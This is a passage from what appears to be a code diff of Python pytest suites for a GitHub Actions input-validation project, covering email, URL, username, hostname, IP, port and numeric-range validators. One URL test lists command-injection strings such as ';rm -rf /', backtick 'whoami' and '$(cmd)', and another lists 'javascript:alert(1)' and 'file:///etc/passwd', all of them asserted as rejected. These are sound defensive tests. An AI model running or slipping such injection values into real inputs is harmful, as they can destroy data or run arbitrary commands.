"""Test email rejects consecutive dots."""
self.validator.clear_errors()
assert self.validator.validate_email("user..name@example.com") is False
assert "consecutive dots" in " ".join(self.validator.errors)
def test_email_domain_without_dot(self):
"""Test email rejects domain without dot."""
self.validator.clear_errors()
assert self.validator.validate_email("user@localhost") is False
assert "must contain a dot" in " ".join(self.validator.errors)
def test_email_domain_starts_or_ends_with_dot(self):
"""Test email rejects domain starting/ending with dot."""
self.validator.clear_errors()
assert self.validator.validate_email("user@.example.com") is False
assert "cannot start/end with dot" in " ".join(self.validator.errors)
self.validator.clear_errors()
assert self.validator.validate_email("user@example.com.") is False
assert "cannot start/end with dot" in " ".join(self.validator.errors)
# URL validation tests
def test_valid_urls(self):
"""Test valid URL formats."""
assert self.validator.validate_url("https://example.com") is True
assert self.validator.validate_url("http://localhost:8080") is True
assert self.validator.validate_url("https://api.example.com/v1/endpoint") is True
assert self.validator.validate_url("http://192.168.1.1") is True
assert self.validator.validate_url("https://example.com/path?query=value") is True
def test_invalid_urls(self):
"""Test invalid URL formats."""
self.validator.clear_errors()
assert self.validator.validate_url("not-a-url") is False
assert self.validator.has_errors()
self.validator.clear_errors()
assert self.validator.validate_url("ftp://example.com") is False
assert "http://" in " ".join(self.validator.errors)
def test_url_empty_not_allowed(self):
"""Test URL rejects empty (not optional)."""
self.validator.clear_errors()
assert self.validator.validate_url("") is False
assert "cannot be empty" in " ".join(self.validator.errors)
def test_url_injection_patterns(self):
"""Test URL rejects injection patterns."""
injection_urls = [
"https://example.com;rm -rf /",
"https://example.com&malicious",
"https://example.com|pipe",
"https://example.com`whoami`",
"https://example.com$(cmd)",
"https://example.com${var}",
]
for url in injection_urls:
self.validator.clear_errors()
assert self.validator.validate_url(url) is False
assert self.validator.has_errors()
# Scope validation tests
def test_validate_scope_valid(self):
"""Test valid NPM scope formats."""
assert self.validator.validate_scope("@organization") is True
assert self.validator.validate_scope("@my-org") is True
assert self.validator.validate_scope("@org_name") is True
assert self.validator.validate_scope("@org.name") is True
def test_validate_scope_invalid(self):
"""Test invalid scope formats."""
self.validator.clear_errors()
assert self.validator.validate_scope("organization") is False
assert "Must start with @" in " ".join(self.validator.errors)
self.validator.clear_errors()
assert self.validator.validate_scope("@") is False
assert "cannot be empty" in " ".join(self.validator.errors)
self.validator.clear_errors()
assert self.validator.validate_scope("@Organization") is False
assert "lowercase" in " ".join(self.validator.errors)
def test_validate_scope_empty(self):
"""Test scope allows empty (optional)."""
assert self.validator.validate_scope("") is True
# Username validation tests
def test_validate_username_valid(self):
"""Test valid usernames."""
assert self.validator.validate_username("user") is True
assert self.validator.validate_username("user123") is True
assert self.validator.validate_username("user-name") is True
assert self.validator.validate_username("user_name") is True
assert self.validator.validate_username("a" * 39) is True # Max length
def test_validate_username_invalid(self):
"""Test invalid usernames."""
self.validator.clear_errors()
assert self.validator.validate_username("user;name") is False
assert "injection" in " ".join(self.validator.errors)
self.validator.clear_errors()
assert self.validator.validate_username("a" * 40) is False
assert "39 characters" in " ".join(self.validator.errors)
self.validator.clear_errors()
assert self.validator.validate_username("-username") is False
assert "alphanumeric" in " ".join(self.validator.errors)
def test_validate_username_empty(self):
"""Test username allows empty (optional)."""
assert self.validator.validate_username("") is True
# Registry URL tests
def test_validate_registry_url_known(self):
"""Test known registry URLs."""
assert self.validator.validate_registry_url("https://registry.npmjs.org/") is True
assert self.validator.validate_registry_url("https://npm.pkg.github.com/") is True
assert self.validator.validate_registry_url("https://pypi.org/simple/") is True
def test_validate_registry_url_custom(self):
"""Test custom registry URLs."""
assert self.validator.validate_registry_url("https://custom-registry.com") is True
def test_validate_registry_url_empty(self):
"""Test registry URL allows empty (optional)."""
assert self.validator.validate_registry_url("") is True
# Repository URL tests
def test_validate_repository_url_github(self):
"""Test GitHub repository URLs."""
assert self.validator.validate_repository_url("https://github.com/user/repo") is True
assert self.validator.validate_repository_url("https://github.com/user/repo.git") is True
def test_validate_repository_url_gitlab(self):
"""Test GitLab repository URLs."""
assert self.validator.validate_repository_url("https://gitlab.com/user/repo") is True
assert self.validator.validate_repository_url("https://gitlab.com/user/repo.git") is True
def test_validate_repository_url_bitbucket(self):
"""Test Bitbucket repository URLs."""
assert self.validator.validate_repository_url("https://bitbucket.org/user/repo") is True
def test_validate_repository_url_empty(self):
"""Test repository URL allows empty (optional)."""
assert self.validator.validate_repository_url("") is True
# Hostname validation tests
def test_validate_hostname_valid(self):
"""Test valid hostnames."""
assert self.validator.validate_hostname("example.com") is True
assert self.validator.validate_hostname("sub.example.com") is True
assert self.validator.validate_hostname("localhost") is True
assert self.validator.validate_hostname("192.168.1.1") is True # IP as hostname
def test_validate_hostname_invalid(self):
"""Test invalid hostnames."""
self.validator.clear_errors()
assert self.validator.validate_hostname("a" * 254) is False
assert "too long" in " ".join(self.validator.errors)
self.validator.clear_errors()
assert self.validator.validate_hostname("-invalid.com") is False
def test_validate_hostname_ipv6_loopback(self):
"""Test IPv6 loopback addresses as hostnames."""
assert self.validator.validate_hostname("::1") is True
assert self.validator.validate_hostname("::") is True
def test_validate_hostname_empty(self):
"""Test hostname allows empty (optional)."""
assert self.validator.validate_hostname("") is True
# IP address validation tests
def test_validate_ip_address_ipv4(self):
"""Test valid IPv4 addresses."""
assert self.validator.validate_ip_address("192.168.1.1") is True
assert self.validator.validate_ip_address("127.0.0.1") is True
assert self.validator.validate_ip_address("10.0.0.1") is True
assert self.validator.validate_ip_address("255.255.255.255") is True
def test_validate_ip_address_ipv4_invalid(self):
"""Test invalid IPv4 addresses."""
self.validator.clear_errors()
assert self.validator.validate_ip_address("256.1.1.1") is False
self.validator.clear_errors()
assert self.validator.validate_ip_address("192.168.1") is False
def test_validate_ip_address_ipv6(self):
"""Test valid IPv6 addresses."""
assert self.validator.validate_ip_address("::1") is True # Loopback
assert self.validator.validate_ip_address("::") is True # Unspecified
assert self.validator.validate_ip_address("2001:0db8:85a3:0000:0000:8a2e:0370:7334") is True
assert self.validator.validate_ip_address("2001:db8::1") is True # Compressed
def test_validate_ip_address_ipv6_invalid(self):
"""Test invalid IPv6 addresses."""
self.validator.clear_errors()
assert self.validator.validate_ip_address("gggg::1") is False
def test_validate_ip_address_empty(self):
"""Test IP address allows empty (optional)."""
assert self.validator.validate_ip_address("") is True
# Port validation tests
def test_validate_port_valid(self):
"""Test valid port numbers."""
assert self.validator.validate_port("80") is True
assert self.validator.validate_port("443") is True
assert self.validator.validate_port("8080") is True
assert self.validator.validate_port("1") is True # Min
assert self.validator.validate_port("65535") is True # Max
def test_validate_port_invalid(self):
"""Test invalid port numbers."""
self.validator.clear_errors()
assert self.validator.validate_port("0") is False
assert "between 1 and 65535" in " ".join(self.validator.errors)
self.validator.clear_errors()
assert self.validator.validate_port("65536") is False
assert "between 1 and 65535" in " ".join(self.validator.errors)
self.validator.clear_errors()
assert self.validator.validate_port("abc") is False
assert "must be a number" in " ".join(self.validator.errors)
def test_validate_port_empty(self):
"""Test port allows empty (optional)."""
assert self.validator.validate_port("") is True
# validate_inputs tests
def test_validate_inputs_with_email(self):
"""Test validate_inputs recognizes email inputs."""
inputs = {"user-email": "test@example.com", "reply-email": "reply@example.com"}
result = self.validator.validate_inputs(inputs)
assert result is True
def test_validate_inputs_with_url(self):
"""Test validate_inputs recognizes URL inputs."""
inputs = {
"api-url": "https://api.example.com",
"registry-url": "https://registry.npmjs.org/",
}
result = self.validator.validate_inputs(inputs)
assert result is True
def test_validate_inputs_with_scope(self):
"""Test validate_inputs recognizes scope inputs."""
inputs = {"npm-scope": "@organization"}
result = self.validator.validate_inputs(inputs)
assert result is True
def test_validate_inputs_with_username(self):
"""Test validate_inputs recognizes username inputs."""
inputs = {"username": "testuser", "user": "anotheruser"}
result = self.validator.validate_inputs(inputs)
assert result is True
def test_validate_inputs_with_invalid_values(self):
"""Test validate_inputs with invalid values."""
inputs = {"email": "invalid-email", "url": "not-a-url"}
result = self.validator.validate_inputs(inputs)
assert result is False
assert len(self.validator.errors) >= 2
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_url("${{ secrets.WEBHOOK_URL }}") is True
assert self.validator.validate_email("${{ github.event.pusher.email }}") is True
def test_error_messages(self):
"""Test that error messages are meaningful."""
self.validator.clear_errors()
self.validator.validate_email("user@", "test-email")
assert len(self.validator.errors) == 1
assert "test-email" in self.validator.errors[0]
self.validator.clear_errors()
self.validator.validate_url("", "my-url")
assert len(self.validator.errors) == 1
assert "my-url" in self.validator.errors[0]

237
validate-inputs/tests/test_network_validator.py Normal file
View File

@@ -0,0 +1,237 @@
"""Tests for the NetworkValidator module."""
from pathlib import Path
import sys
import pytest # pylint: disable=import-error
# Add the parent directory to the path
sys.path.insert(0, str(Path(__file__).parent.parent))
from validators.network import NetworkValidator
from tests.fixtures.version_test_data import (
EMAIL_INVALID,
EMAIL_VALID,
USERNAME_INVALID,
USERNAME_VALID,
)
class TestNetworkValidator:
"""Test cases for NetworkValidator."""
def setup_method(self):
"""Set up test environment."""
self.validator = NetworkValidator()
def test_initialization(self):
"""Test validator initialization."""
assert self.validator.errors == []
rules = self.validator.get_validation_rules()
assert rules is not None
@pytest.mark.parametrize("email,description", EMAIL_VALID)
def test_validate_email_valid(self, email, description):
"""Test email validation with valid emails."""
self.validator.errors = []
result = self.validator.validate_email(email)
assert result is True, f"Failed for {description}: {email}"
assert len(self.validator.errors) == 0
@pytest.mark.parametrize("email,description", EMAIL_INVALID)
def test_validate_email_invalid(self, email, description):
"""Test email validation with invalid emails."""
self.validator.errors = []
result = self.validator.validate_email(email)
if email == "": # Empty email might be allowed
assert isinstance(result, bool)
else:
assert result is False, f"Should fail for {description}: {email}"
assert len(self.validator.errors) > 0
@pytest.mark.parametrize("username,description", USERNAME_VALID)
def test_validate_username_valid(self, username, description):
"""Test username validation with valid usernames."""
self.validator.errors = []
result = self.validator.validate_username(username)
assert result is True, f"Failed for {description}: {username}"
assert len(self.validator.errors) == 0
@pytest.mark.parametrize("username,description", USERNAME_INVALID)
def test_validate_username_invalid(self, username, description):
"""Test username validation with invalid usernames."""
self.validator.errors = []
result = self.validator.validate_username(username)
if username == "": # Empty username is allowed
assert result is True
else:
assert result is False, f"Should fail for {description}: {username}"
def test_validate_url_valid(self):
"""Test URL validation with valid URLs."""
valid_urls = [
"https://github.com",
"http://example.com",
"https://api.github.com/repos/owner/repo",
"https://example.com:8080",
"https://sub.domain.example.com",
"http://localhost",
"http://localhost:3000",
"https://192.168.1.1",
"https://example.com/path/to/resource",
"https://example.com/path?query=value",
"https://example.com#fragment",
]
for url in valid_urls:
self.validator.errors = []
result = self.validator.validate_url(url)
assert result is True, f"Should accept URL: {url}"
def test_validate_url_invalid(self):
"""Test URL validation with invalid URLs."""
invalid_urls = [
"not-a-url",
"ftp://example.com", # FTP not supported
"javascript:alert(1)", # JavaScript protocol
"file:///etc/passwd", # File protocol
"//example.com", # Protocol-relative URL
"example.com", # Missing protocol
"http://", # Incomplete URL
"http:/example.com", # Single slash
"http:///example.com", # Triple slash
"", # Empty
]
for url in invalid_urls:
self.validator.errors = []
result = self.validator.validate_url(url)
if url == "":
# Empty might be allowed for optional
assert isinstance(result, bool)
else:
assert result is False, f"Should reject URL: {url}"
def test_validate_hostname_valid(self):
"""Test hostname validation with valid hostnames."""
valid_hostnames = [
"example.com",
"sub.example.com",
"sub.sub.example.com",
"example-site.com",
"123.example.com",
"localhost",
"my-server",
"server123",
"192.168.1.1",
"::1", # IPv6 localhost
]
for hostname in valid_hostnames:
self.validator.errors = []
result = self.validator.validate_hostname(hostname)
assert result is True, f"Should accept hostname: {hostname}"
def test_validate_hostname_invalid(self):
"""Test hostname validation with invalid hostnames."""
invalid_hostnames = [
"example..com", # Double dot
"-example.com", # Leading dash
"example-.com", # Trailing dash
"exam ple.com", # Space
"example.com/path", # Path included
"http://example.com", # Protocol included
"example.com:8080", # Port included
"", # Empty
]
for hostname in invalid_hostnames:
self.validator.errors = []
result = self.validator.validate_hostname(hostname)
if hostname == "":
assert isinstance(result, bool)
else:
assert result is False, f"Should reject hostname: {hostname}"
def test_validate_ip_address(self):
"""Test IP address validation."""
valid_ips = [
"192.168.1.1",
"10.0.0.1",
"172.16.0.1",
"8.8.8.8",
"0.0.0.0", # noqa: S104
"255.255.255.255",
]
for ip in valid_ips:
self.validator.errors = []
result = self.validator.validate_ip_address(ip)
assert result is True, f"Should accept IP: {ip}"
invalid_ips = [
"256.256.256.256", # Out of range
"192.168.1", # Incomplete
"192.168.1.1.1", # Too many octets
"192.168.-1.1", # Negative
"192.168.a.1", # Non-numeric
"example.com", # Domain name
]
for ip in invalid_ips:
self.validator.errors = []
result = self.validator.validate_ip_address(ip)
assert result is False, f"Should reject IP: {ip}"
def test_validate_port_number(self):
"""Test port number validation."""
valid_ports = [
"80",
"443",
"8080",
"3000",
"65535", # Maximum port
"1", # Minimum port
]
for port in valid_ports:
self.validator.errors = []
result = self.validator.validate_port(port)
assert result is True, f"Should accept port: {port}"
invalid_ports = [
"0", # Too low
"65536", # Too high
"-1", # Negative
"abc", # Non-numeric
"80.0", # Decimal
]
for port in invalid_ports:
self.validator.errors = []
result = self.validator.validate_port(port)
assert result is False, f"Should reject port: {port}"
def test_empty_values_handling(self):
"""Test that empty values are handled appropriately."""
assert self.validator.validate_email("") is True # Empty allowed for optional
assert self.validator.validate_username("") is True
assert isinstance(self.validator.validate_url(""), bool)
assert isinstance(self.validator.validate_hostname(""), bool)
def test_validate_inputs_with_network_keywords(self):
"""Test validation of inputs with network-related keywords."""
inputs = {
"email": "test@example.com",
"username": "testuser",
"url": "https://example.com",
"webhook-url": "https://hooks.example.com/webhook",
"api-endpoint": "https://api.example.com/v1",
"hostname": "server.example.com",
"server-address": "192.168.1.100",
"port": "8080",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)

74
validate-inputs/tests/test_node-setup_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for node-setup custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "node-setup"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomNodeSetupValidator:
"""Test cases for node-setup custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("node-setup")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for node-setup
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for node-setup
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for node-setup
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for node-setup
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

74
validate-inputs/tests/test_npm-publish_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for npm-publish custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "npm-publish"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomNpmPublishValidator:
"""Test cases for npm-publish custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("npm-publish")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for npm-publish
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for npm-publish
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for npm-publish
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for npm-publish
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

335
validate-inputs/tests/test_numeric.py Normal file
View File

@@ -0,0 +1,335 @@
"""Tests for numeric validator."""
from validators.numeric import NumericValidator
class TestNumericValidator:
"""Test cases for NumericValidator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = NumericValidator("test-action")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_initialization(self):
"""Test validator initialization."""
assert self.validator.action_type == "test-action"
assert len(self.validator.errors) == 0
def test_get_required_inputs(self):
"""Test get_required_inputs returns empty list."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
assert len(required) == 0
def test_get_validation_rules(self):
"""Test get_validation_rules returns dict."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
assert "retries" in rules
assert "timeout" in rules
assert "threads" in rules
assert "ram" in rules
def test_valid_integers(self):
"""Test valid integer values."""
assert self.validator.validate_integer("42") is True
assert self.validator.validate_integer("-10") is True
assert self.validator.validate_integer("0") is True
assert self.validator.validate_integer(42) is True # int type
assert self.validator.validate_integer(-10) is True
def test_invalid_integers(self):
"""Test invalid integer values."""
self.validator.clear_errors()
assert self.validator.validate_integer("3.14") is False
assert self.validator.has_errors()
self.validator.clear_errors()
assert self.validator.validate_integer("abc") is False
assert self.validator.has_errors()
self.validator.clear_errors()
assert self.validator.validate_integer("!") is False
assert self.validator.has_errors()
def test_integer_empty_optional(self):
"""Test integer allows empty (optional)."""
assert self.validator.validate_integer("") is True
assert self.validator.validate_integer(" ") is True
def test_numeric_ranges(self):
"""Test numeric range validation."""
assert self.validator.validate_range("5", min_val=1, max_val=10) is True
assert self.validator.validate_range("1", min_val=1, max_val=10) is True # Boundary
assert self.validator.validate_range("10", min_val=1, max_val=10) is True # Boundary
self.validator.clear_errors()
assert self.validator.validate_range("15", min_val=1, max_val=10) is False
assert self.validator.has_errors()
self.validator.clear_errors()
assert self.validator.validate_range("-5", 0, None) is False
assert self.validator.has_errors()
def test_range_with_none_bounds(self):
"""Test range validation with None min/max."""
# No minimum
assert self.validator.validate_range("-100", None, 10) is True
assert self.validator.validate_range("15", None, 10) is False
# No maximum
assert self.validator.validate_range("1000", 0, None) is True
self.validator.clear_errors()
assert self.validator.validate_range("-5", 0, None) is False
# No bounds
assert self.validator.validate_range("999999", None, None) is True
assert self.validator.validate_range("-999999", None, None) is True
def test_range_empty_optional(self):
"""Test range allows empty (optional)."""
assert self.validator.validate_range("", 0, 100) is True
assert self.validator.validate_range(" ", 0, 100) is True
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_integer("${{ inputs.timeout }}") is True
assert self.validator.validate_range("${{ env.RETRIES }}", 1, 2) is True
# validate_positive_integer and validate_non_negative_integer methods
# do not support GitHub expression syntax
def test_validate_positive_integer_valid(self):
"""Test positive integer validation with valid values."""
assert self.validator.validate_positive_integer("1") is True
assert self.validator.validate_positive_integer("100") is True
assert self.validator.validate_positive_integer("999999") is True
def test_validate_positive_integer_invalid(self):
"""Test positive integer validation with invalid values."""
self.validator.clear_errors()
assert self.validator.validate_positive_integer("0") is False
assert self.validator.has_errors()
self.validator.clear_errors()
assert self.validator.validate_positive_integer("-1") is False
assert self.validator.has_errors()
self.validator.clear_errors()
assert self.validator.validate_positive_integer("abc") is False
assert self.validator.has_errors()
def test_validate_positive_integer_empty(self):
"""Test positive integer allows empty (optional)."""
assert self.validator.validate_positive_integer("") is True
def test_validate_non_negative_integer_valid(self):
"""Test non-negative integer validation with valid values."""
assert self.validator.validate_non_negative_integer("0") is True
assert self.validator.validate_non_negative_integer("1") is True
assert self.validator.validate_non_negative_integer("100") is True
def test_validate_non_negative_integer_invalid(self):
"""Test non-negative integer validation with invalid values."""
self.validator.clear_errors()
assert self.validator.validate_non_negative_integer("-1") is False
assert self.validator.has_errors()
self.validator.clear_errors()
assert self.validator.validate_non_negative_integer("-100") is False
assert self.validator.has_errors()
self.validator.clear_errors()
assert self.validator.validate_non_negative_integer("abc") is False
assert self.validator.has_errors()
def test_validate_non_negative_integer_empty(self):
"""Test non-negative integer allows empty (optional)."""
assert self.validator.validate_non_negative_integer("") is True
def test_validate_numeric_range_alias(self):
"""Test validate_numeric_range is alias for validate_range."""
assert self.validator.validate_numeric_range("5", 1, 10) is True
assert self.validator.validate_numeric_range("15", 1, 10) is False
def test_validate_numeric_range_0_100(self):
"""Test percentage/quality range (0-100)."""
assert self.validator.validate_numeric_range_0_100("0") is True
assert self.validator.validate_numeric_range_0_100("50") is True
assert self.validator.validate_numeric_range_0_100("100") is True
self.validator.clear_errors()
assert self.validator.validate_numeric_range_0_100("-1") is False
assert self.validator.has_errors()
self.validator.clear_errors()
assert self.validator.validate_numeric_range_0_100("101") is False
def test_validate_numeric_range_1_10(self):
"""Test retries range (1-10)."""
assert self.validator.validate_numeric_range_1_10("1") is True
assert self.validator.validate_numeric_range_1_10("5") is True
assert self.validator.validate_numeric_range_1_10("10") is True
self.validator.clear_errors()
assert self.validator.validate_numeric_range_1_10("0") is False
assert self.validator.has_errors()
self.validator.clear_errors()
assert self.validator.validate_numeric_range_1_10("11") is False
def test_validate_numeric_range_1_128(self):
"""Test threads/workers range (1-128)."""
assert self.validator.validate_numeric_range_1_128("1") is True
assert self.validator.validate_numeric_range_1_128("64") is True
assert self.validator.validate_numeric_range_1_128("128") is True
self.validator.clear_errors()
assert self.validator.validate_numeric_range_1_128("0") is False
self.validator.clear_errors()
assert self.validator.validate_numeric_range_1_128("129") is False
def test_validate_numeric_range_256_32768(self):
"""Test RAM range (256-32768 MB)."""
assert self.validator.validate_numeric_range_256_32768("256") is True
assert self.validator.validate_numeric_range_256_32768("1024") is True
assert self.validator.validate_numeric_range_256_32768("32768") is True
self.validator.clear_errors()
assert self.validator.validate_numeric_range_256_32768("255") is False
self.validator.clear_errors()
assert self.validator.validate_numeric_range_256_32768("32769") is False
def test_validate_numeric_range_0_16(self):
"""Test parallel builds range (0-16)."""
assert self.validator.validate_numeric_range_0_16("0") is True
assert self.validator.validate_numeric_range_0_16("8") is True
assert self.validator.validate_numeric_range_0_16("16") is True
self.validator.clear_errors()
assert self.validator.validate_numeric_range_0_16("-1") is False
self.validator.clear_errors()
assert self.validator.validate_numeric_range_0_16("17") is False
def test_validate_numeric_range_0_10000(self):
"""Test max warnings range (0-10000)."""
assert self.validator.validate_numeric_range_0_10000("0") is True
assert self.validator.validate_numeric_range_0_10000("5000") is True
assert self.validator.validate_numeric_range_0_10000("10000") is True
self.validator.clear_errors()
assert self.validator.validate_numeric_range_0_10000("-1") is False
self.validator.clear_errors()
assert self.validator.validate_numeric_range_0_10000("10001") is False
def test_validate_numeric_range_1_300(self):
"""Test delay range (1-300 seconds)."""
assert self.validator.validate_numeric_range_1_300("1") is True
assert self.validator.validate_numeric_range_1_300("150") is True
assert self.validator.validate_numeric_range_1_300("300") is True
self.validator.clear_errors()
assert self.validator.validate_numeric_range_1_300("0") is False
self.validator.clear_errors()
assert self.validator.validate_numeric_range_1_300("301") is False
def test_validate_numeric_range_1_3600(self):
"""Test timeout range (1-3600 seconds)."""
assert self.validator.validate_numeric_range_1_3600("1") is True
assert self.validator.validate_numeric_range_1_3600("1800") is True
assert self.validator.validate_numeric_range_1_3600("3600") is True
self.validator.clear_errors()
assert self.validator.validate_numeric_range_1_3600("0") is False
self.validator.clear_errors()
assert self.validator.validate_numeric_range_1_3600("3601") is False
def test_validate_inputs_with_retries(self):
"""Test validate_inputs recognizes retry inputs."""
inputs = {"retries": "5", "max-retry": "3"}
result = self.validator.validate_inputs(inputs)
assert result is True
assert len(self.validator.errors) == 0
def test_validate_inputs_with_timeout(self):
"""Test validate_inputs recognizes timeout inputs."""
inputs = {"timeout": "60", "connection-timeout": "30"}
result = self.validator.validate_inputs(inputs)
assert result is True
def test_validate_inputs_with_threads(self):
"""Test validate_inputs recognizes thread/worker inputs."""
inputs = {"threads": "4", "workers": "8"}
result = self.validator.validate_inputs(inputs)
assert result is True
def test_validate_inputs_with_ram(self):
"""Test validate_inputs recognizes RAM/memory inputs."""
inputs = {"ram": "1024", "memory": "2048"}
result = self.validator.validate_inputs(inputs)
assert result is True
def test_validate_inputs_with_quality(self):
"""Test validate_inputs recognizes quality inputs."""
inputs = {"quality": "85", "image-quality": "90"}
result = self.validator.validate_inputs(inputs)
assert result is True
def test_validate_inputs_with_parallel_builds(self):
"""Test validate_inputs recognizes parallel builds inputs."""
inputs = {"parallel-builds": "4"}
result = self.validator.validate_inputs(inputs)
assert result is True
def test_validate_inputs_with_max_warnings(self):
"""Test validate_inputs recognizes max warnings inputs."""
inputs = {"max-warnings": "100", "max_warnings": "50"}
result = self.validator.validate_inputs(inputs)
assert result is True
def test_validate_inputs_with_delay(self):
"""Test validate_inputs recognizes delay inputs."""
inputs = {"delay": "10", "retry-delay": "5"}
result = self.validator.validate_inputs(inputs)
assert result is True
def test_validate_inputs_with_invalid_values(self):
"""Test validate_inputs with invalid values."""
inputs = {"retries": "20", "timeout": "0"} # Both out of range
result = self.validator.validate_inputs(inputs)
assert result is False
assert len(self.validator.errors) >= 2
def test_validate_inputs_with_empty_values(self):
"""Test validate_inputs with empty values (should be optional)."""
inputs = {"retries": "", "timeout": " "}
result = self.validator.validate_inputs(inputs)
assert result is True
def test_error_messages(self):
"""Test that error messages are meaningful."""
self.validator.clear_errors()
self.validator.validate_range("150", 1, 100, "test-value")
assert len(self.validator.errors) == 1
assert "test-value" in self.validator.errors[0]
assert "100" in self.validator.errors[0]
self.validator.clear_errors()
self.validator.validate_range("-5", 0, 100, "count")
assert len(self.validator.errors) == 1
assert "count" in self.validator.errors[0]
assert "0" in self.validator.errors[0]
self.validator.clear_errors()
self.validator.validate_integer("abc", "my-number")
assert len(self.validator.errors) == 1
assert "my-number" in self.validator.errors[0]

170
validate-inputs/tests/test_numeric_validator.py Normal file
View File

@@ -0,0 +1,170 @@
"""Tests for the NumericValidator module."""
from pathlib import Path
import sys
import pytest # pylint: disable=import-error
# Add the parent directory to the path
sys.path.insert(0, str(Path(__file__).parent.parent))
# pylint: disable=wrong-import-position
from validators.numeric import NumericValidator
from tests.fixtures.version_test_data import NUMERIC_RANGE_INVALID, NUMERIC_RANGE_VALID
class TestNumericValidator:
"""Test cases for NumericValidator."""
def setup_method(self): # pylint: disable=attribute-defined-outside-init
"""Set up test environment."""
self.validator = NumericValidator()
def test_initialization(self):
"""Test validator initialization."""
assert not self.validator.errors
rules = self.validator.get_validation_rules()
assert rules is not None
@pytest.mark.parametrize("value,description", NUMERIC_RANGE_VALID)
def test_validate_numeric_range_valid(self, value, description):
"""Test numeric range validation with valid values."""
self.validator.errors = []
result = self.validator.validate_numeric_range(value, 0, 100, "test")
assert result is True, f"Failed for {description}: {value}"
assert len(self.validator.errors) == 0
@pytest.mark.parametrize("value,description", NUMERIC_RANGE_INVALID)
def test_validate_numeric_range_invalid(self, value, description):
"""Test numeric range validation with invalid values."""
self.validator.errors = []
result = self.validator.validate_numeric_range(value, 0, 100, "test")
if value == "": # Empty value is allowed
assert result is True
else:
assert result is False, f"Should fail for {description}: {value}"
assert len(self.validator.errors) > 0
def test_validate_range_with_no_limits(self):
"""Test validation with no min/max limits."""
# No limits - any number should be valid
assert self.validator.validate_range("999999", None, None, "test") is True
assert self.validator.validate_range("-999999", None, None, "test") is True
assert self.validator.validate_range("0", None, None, "test") is True
def test_validate_range_with_min_only(self):
"""Test validation with only minimum limit."""
self.validator.errors = []
assert self.validator.validate_range("10", 5, None, "test") is True
assert self.validator.validate_range("5", 5, None, "test") is True
self.validator.errors = []
assert self.validator.validate_range("4", 5, None, "test") is False
assert len(self.validator.errors) > 0
def test_validate_range_with_max_only(self):
"""Test validation with only maximum limit."""
self.validator.errors = []
assert self.validator.validate_range("10", None, 20, "test") is True
assert self.validator.validate_range("20", None, 20, "test") is True
self.validator.errors = []
assert self.validator.validate_range("21", None, 20, "test") is False
assert len(self.validator.errors) > 0
def test_validate_numeric_range_0_100(self):
"""Test percentage/quality value validation (0-100)."""
# Valid values
valid_values = ["0", "50", "100", "75"]
for value in valid_values:
self.validator.errors = []
result = self.validator.validate_numeric_range_0_100(value)
assert result is True, f"Should accept: {value}"
# Invalid values
invalid_values = ["-1", "101", "abc", "50.5"]
for value in invalid_values:
self.validator.errors = []
result = self.validator.validate_numeric_range_0_100(value)
